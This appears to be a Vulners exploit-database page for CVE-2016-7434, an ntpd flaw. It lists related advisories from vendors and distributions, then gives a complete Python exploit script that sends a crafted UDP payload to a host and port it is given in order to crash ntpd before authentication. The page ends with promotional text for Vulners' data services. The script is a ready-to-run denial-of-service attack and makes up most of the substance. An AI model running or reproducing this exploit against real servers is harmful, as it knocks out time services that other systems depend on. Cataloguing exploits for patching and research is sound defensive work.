| Reporter | Title | Published | Views | Family All 78 |
|---|---|---|---|---|
| NTP 4.2.8p8 - Denial of Service Exploit | 23 Nov 201600:00 | – | zdt | |
| Exploit for Improper Input Validation in Ntp | 22 Nov 201619:42 | – | githubexploit | |
| Security Bulletin: Multiple vulnerabilities in ntp affect IBM Flex System Manager (FSM) | 18 Jun 201801:36 | – | ibm | |
| Security Bulletin: Vulnerabilities in NTP affect IBM Flex System Chassis Management Module (CMM) | 31 Jan 201902:25 | – | ibm | |
| ntp -- multiple vulnerabilities | 21 Nov 201600:00 | – | freebsd | |
| FreeBSD -- Multiple vulnerabilities of ntp | 22 Dec 201600:00 | – | freebsd | |
| [ASA-201611-28] ntp: multiple issues | 26 Nov 201600:00 | – | archlinux | |
| BSA-2017-224 | 28 Apr 201700:00 | – | broadcom | |
| USN-3349-1: NTP vulnerabilities | Cloud Foundry | 4 Aug 201700:00 | – | cloudfoundry | |
| CVE-2016-7434 | 21 Nov 201600:00 | – | circl |
#!/usr/bin/env python
# Exploit Title: ntpd remote pre-auth Denial of Service
# Date: 2016-11-21
# Exploit Author: Magnus Klaaborg Stubman (@magnusstubman)
# Website: http://dumpco.re/cve-2016-7434/
# Vendor Homepage: http://www.ntp.org/
# Software Link: https://www.eecis.udel.edu/~ntp/ntp_spool/ntp4/ntp-4.2/ntp-4.2.8p8.tar.gz
# Version: ntp-4.2.7p22, up to but not including ntp-4.2.8p9, and ntp-4.3.0 up to, but not including ntp-4.3.94
# CVE: CVE-2016-7434
import sys
import socket
if len(sys.argv) != 3:
print "usage: " + sys.argv[0] + " <host> <port>"
sys.exit(-1)
payload = "\x16\x0a\x00\x10\x00\x00\x00\x00\x00\x00\x00\x36\x6e\x6f\x6e\x63\x65\x2c\x20\x6c\x61\x64\x64\x72\x3d\x5b\x5d\x3a\x48\x72\x61\x67\x73\x3d\x33\x32\x2c\x20\x6c\x61\x64\x64\x72\x3d\x5b\x5d\x3a\x57\x4f\x50\x00\x32\x2c\x20\x6c\x61\x64\x64\x72\x3d\x5b\x5d\x3a\x57\x4f\x50\x00\x00"
print "[-] Sending payload to " + sys.argv[1] + ":" + sys.argv[2] + " ..."
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(payload, (sys.argv[1], int(sys.argv[2])))
print "[+] Done!"Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation